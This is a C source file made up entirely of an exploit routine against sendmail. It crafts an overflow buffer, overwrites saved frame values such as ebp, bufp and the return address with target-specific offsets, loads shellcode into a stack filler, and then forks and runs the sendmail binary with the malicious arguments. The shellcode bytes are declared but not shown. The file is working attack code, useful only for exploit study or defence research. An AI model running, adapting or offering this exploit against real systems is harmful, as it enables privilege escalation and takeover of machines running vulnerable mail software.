
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct target_info {int stack_len; int distance; size_t ebp; size_t delimptr; size_t pvpbuf; int zero; size_t al; size_t e; size_t bufp; int chunk; int ret; int sendmail; } ;


 int SIGKILL ;
 scalar_t__ WIFEXITED (int) ;
 int execve (int ,char**,int *) ;
 int exit (int) ;
 int fork () ;
 int getpid () ;
 int kill (int ,int ) ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int perror (char*) ;
 char* shellcode ;
 int strcat (char*,char*) ;
 int strlen (char*) ;
 int wait (int*) ;

int exploit(struct target_info target) {
 char *stackfiller=0;
 char egg[1024*3];
 char *ptr;
 int *ptr2;
 int i;
 int pid;
 char *arg[] = { "owned",egg,stackfiller,((void*)0)};





 stackfiller = (char*) malloc(target.stack_len);
 if(!stackfiller) {
  perror("malloc()");
  exit(0);
 }

 memset(stackfiller,'A',target.stack_len);
 *(stackfiller+target.stack_len-1) = 0;

 ptr = stackfiller;

        while(1) {

         char *chunk = "\xfc\xff\xff\xff"
           "\xfc\xff\xff\xff"
           "\xa1\xff\xff\xbf"
           "\xa1\xff\xff\xbf"
           "\xa1\xff\xff\xbf";

                memcpy(ptr,chunk,strlen(chunk));
         ptr += strlen(chunk);

         if(ptr + strlen(chunk) >= stackfiller+target.stack_len-1)
                 break;
 }
 memcpy(stackfiller,shellcode,strlen(shellcode));
 arg[2] = stackfiller;




 memset(egg,'A',1200);
 egg[1200] = 0;

        for(i=0; i < target.distance - 1200; i++)
         strcat(egg,"\xff\\");


        ptr2 = (int*) &egg[target.ebp+target.delimptr-target.pvpbuf];
        *ptr2 = target.zero;


        ptr2 = (int*) &egg[target.ebp+target.al-target.pvpbuf];
 *ptr2 = target.zero-11*4;


        ptr2 = (int*) &egg[target.ebp+target.e-target.pvpbuf];
 *ptr2 = target.zero;



        ptr2 = (int*) &egg[target.ebp+target.bufp-target.pvpbuf];
 *ptr2 = target.chunk;


 ptr2 = (int*) &egg[target.ebp+4-target.pvpbuf];
 *ptr2 = target.ret;






 pid = fork();
 if(pid == -1) {
  perror("fork()");
  exit(-1);
 }


 if(pid==0) {
  execve(target.sendmail,arg,((void*)0));
  perror("execve()");
  kill(getpid(),SIGKILL);
  exit(0);
 }
 else {
  int status;
  wait(&status);

  if(WIFEXITED(status) == 0)
   return 0;
  return 1;
 }
}
